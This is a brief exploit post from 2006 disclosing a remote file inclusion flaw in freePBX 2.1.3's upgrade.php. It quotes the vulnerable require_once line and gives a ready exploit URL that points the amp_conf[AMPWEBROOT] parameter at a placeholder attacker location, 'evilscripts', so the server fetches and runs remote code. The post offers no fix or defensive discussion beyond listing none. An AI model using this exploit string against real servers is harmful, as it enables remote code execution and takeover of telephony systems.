freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability

2006-10-28 00:00:00

Script: freePBX
Version: v2.1.3
Script Download: http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.